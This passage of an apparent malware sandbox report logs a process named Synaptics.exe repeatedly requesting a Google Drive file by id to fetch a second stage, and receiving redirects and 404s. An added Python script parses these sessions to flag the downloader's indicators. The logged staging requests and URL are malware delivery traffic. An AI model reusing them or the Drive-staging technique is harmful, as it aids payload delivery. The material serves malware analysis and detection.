                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                               2024-12-30 10:25:33 UTC | 147 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                               2024-12-30 10:25:33 UTC | 1390 | IN | Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 6b 61 52 79 68 6e 34 5a 42 58 32 4f 78 4b 79 67 65 31 45 31 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="HkaRyhn4ZBX2OxKyge1E1g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                               2024-12-30 10:25:33 UTC | 115 | IN | Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                               Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>

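The sessions above are one exchange repeated: C:\ProgramData\Synaptics\Synaptics.exe (PID 6892) asks docs.google.com for a Drive object by file id with a User-Agent that is just its own file name, is sent a 303 to drive.usercontent.google.com, and gets a 404 there because the staged object is gone. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses raw HTTP request/response text reconstructed from sessions 35 and 37 (constructed input, cookie shortened and most response headers dropped), flags the two indicators visible in them (an executable name as User-Agent, a cloud-storage download by file id), and links the 303 Location to the follow-up request so the analyst sees that no second stage was delivered. The CLOUD_STAGING_HOSTS set and the finding strings are this example's own choices.

```python
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Assumption: hosts the sample used as payload staging; any request to them
# carrying a Drive file id is surfaced regardless of outcome.
CLOUD_STAGING_HOSTS = {"docs.google.com", "drive.usercontent.google.com"}
REDIRECTS = {301, 302, 303, 307, 308}


@dataclass
class HttpMessage:
    start_line: str
    headers: dict = field(default_factory=dict)  # lower-cased header names

    def header(self, name):
        return self.headers.get(name.lower())


def parse_http(text):
    """Parse start line and headers of a raw HTTP/1.1 message; body ignored."""
    lines = text.strip().splitlines()
    msg = HttpMessage(lines[0].strip())
    for line in lines[1:]:
        if not line.strip():
            break  # blank line terminates the header block
        name, _, value = line.partition(":")
        msg.headers[name.strip().lower()] = value.strip()
    return msg


def request_url(req):
    """Rebuild (method, https://host/target) from request line and Host header."""
    method, target, _ = req.start_line.split(" ", 2)
    return method, "https://" + req.header("Host") + target


def status_code(resp):
    return int(resp.start_line.split(" ", 2)[1])


def drive_file_id(url):
    """Google Drive file id from ?id=..., or None when absent."""
    return parse_qs(urlsplit(url).query).get("id", [None])[0]


def classify_session(raw_request, raw_response, process):
    """Findings for one request/response pair, as human-readable strings."""
    req, resp = parse_http(raw_request), parse_http(raw_response)
    method, url = request_url(req)
    ua = req.header("User-Agent") or ""
    findings = []
    # 1. A bare executable name as User-Agent: real HTTP clients send a
    #    product/version token; this downloader sends its own file name.
    if ua.lower().endswith(".exe"):
        findings.append(f"exe-style User-Agent '{ua}' from {process}")
    # 2. Cloud storage as staging: export=download on a Drive file id.
    fid = drive_file_id(url)
    if urlsplit(url).hostname in CLOUD_STAGING_HOSTS and fid:
        findings.append(f"cloud staging fetch {method} {url} (drive id {fid})")
    # 3. Outcome, so the analyst knows whether a second stage was delivered.
    code = status_code(resp)
    if code in REDIRECTS:
        findings.append(f"redirected ({code}) to {resp.header('Location')}")
    elif code == 404:
        findings.append("staging object gone (404): no second stage delivered")
    elif code == 200:
        findings.append(f"payload served, {resp.header('Content-Length')} bytes")
    return findings


def redirect_chain(sessions):
    """Link each 3xx Location to the later request that fetched that URL.

    Returns (first_url, redirect_target, final_status_or_None) tuples."""
    responses_by_url = {}
    for raw_req, raw_resp, _ in sessions:
        _, url = request_url(parse_http(raw_req))
        responses_by_url.setdefault(url, []).append(parse_http(raw_resp))
    chains = []
    for raw_req, raw_resp, _ in sessions:
        resp = parse_http(raw_resp)
        if status_code(resp) in REDIRECTS:
            _, url = request_url(parse_http(raw_req))
            target = resp.header("Location")
            followed = responses_by_url.get(target)
            final = status_code(followed[0]) if followed else None
            chains.append((url, target, final))
    return chains


# Constructed input, trimmed from sessions 35 and 37 of the report.
PROCESS = r"C:\ProgramData\Synaptics\Synaptics.exe"
REQ_DOCS = """GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVd...
"""
RESP_303 = """HTTP/1.1 303 See Other
Content-Type: application/binary
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Server: ESF
Content-Length: 0
"""
REQ_DRIVE = """GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
"""
RESP_404 = """HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Content-Length: 1652
Server: UploadServer
"""
SESSIONS = [(REQ_DOCS, RESP_303, PROCESS), (REQ_DRIVE, RESP_404, PROCESS)]

if __name__ == "__main__":
    for raw_req, raw_resp, proc in SESSIONS:
        for finding in classify_session(raw_req, raw_resp, proc):
            print(" -", finding)
    for first, target, final in redirect_chain(SESSIONS):
        print(f"{first}\n  -> {target}\n  -> HTTP {final}")
```

The User-Agent rule is the cheap, high-signal one: a browser hitting the same Drive URL produces the staging finding and the redirect but not the exe-style hit, so the two rules together separate this downloader from ordinary Drive traffic. Because the 404 means the staged payload is already gone, the file id is still worth keeping as an indicator even though nothing was delivered during this run.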

                                                                                                               Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                                               39         | 192.168.2.8 | 49780       | 216.58.206.46  | 443              | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                               Timestamp               | Bytes transferred | Direction | Data
                                                                                                               2024-12-30 10:25:33 UTC | 345               | OUT       | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                                                                                                               2024-12-30 10:25:34 UTC | 1314              | IN        | HTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:34 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-5mLQNRjRC4G6BXudW4xm4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              40 | 192.168.2.8 | 49781 | 216.58.206.46 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2024-12-30 10:25:33 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                                                                                                              2024-12-30 10:25:34 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:34 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-bfSXW1wV-AW8zLTad8A_UA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              41 | 192.168.2.8 | 49784 | 172.217.16.193 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2024-12-30 10:25:34 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                              2024-12-30 10:25:34 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC7NKv4K7uh9icV8beG1G-C0nFwY04baUCzwiBoS13FCyi8UCB8PbDnBdtxAPOuT7V39
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:34 GMT
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-czx8Jis7tppnJ0wUUfRY7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:34 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:25:34 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="L5Yb08FyhoCH-SlAHuVJbA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:25:34 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              42 | 192.168.2.8 | 49787 | 216.58.206.46 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2024-12-30 10:25:34 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                                                                                                              2024-12-30 10:25:35 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:34 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-UBwZJ5ETgQax5yIgzMxIsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              43 | 192.168.2.8 | 49788 | 216.58.206.46 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2024-12-30 10:25:34 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                                                                                                              2024-12-30 10:25:35 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-esQfeSAsTcTY0cef746ctA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              44 | 192.168.2.8 | 49789 | 172.217.16.193 | 443 | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2024-12-30 10:25:34 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                              2024-12-30 10:25:35 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5zCl7tfIHxqfEFWxVOR4M0tSe-fW3xJufJFgxn7zqpNZc0CYz0GHNdt52jPby5ZSab
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-UrFnLCUNUMUPFdmOfrpI3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:35 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:25:35 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="-wDL1r0BzKRDJr9u2pDHCA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:25:35 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
45          192.168.2.8  49790        172.217.16.193  443               6892  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:25:35 UTC  388                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
2024-12-30 10:25:35 UTC  1243               IN         HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC6-rT-TxuIr7G52EyUoMbYVuNEAtr-kYpZic6RN6H6FhZxgh7jFVMPzJa9LNK0Q1vJg
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:35 GMT
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: script-src 'report-sample' 'nonce-lqiyxKo0SI86GbWsz8eq3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Cross-Origin-Opener-Policy: same-origin
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2024-12-30 10:25:35 UTC  147                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:35 UTC  1390               IN         Data Ascii: t Found)!!1</title><style nonce="_ol1Eu8GFqQOYQy8FYqKuw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:35 UTC  115                IN         Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
46          192.168.2.8  49792        216.58.206.46   443               6892  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:25:35 UTC  345                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
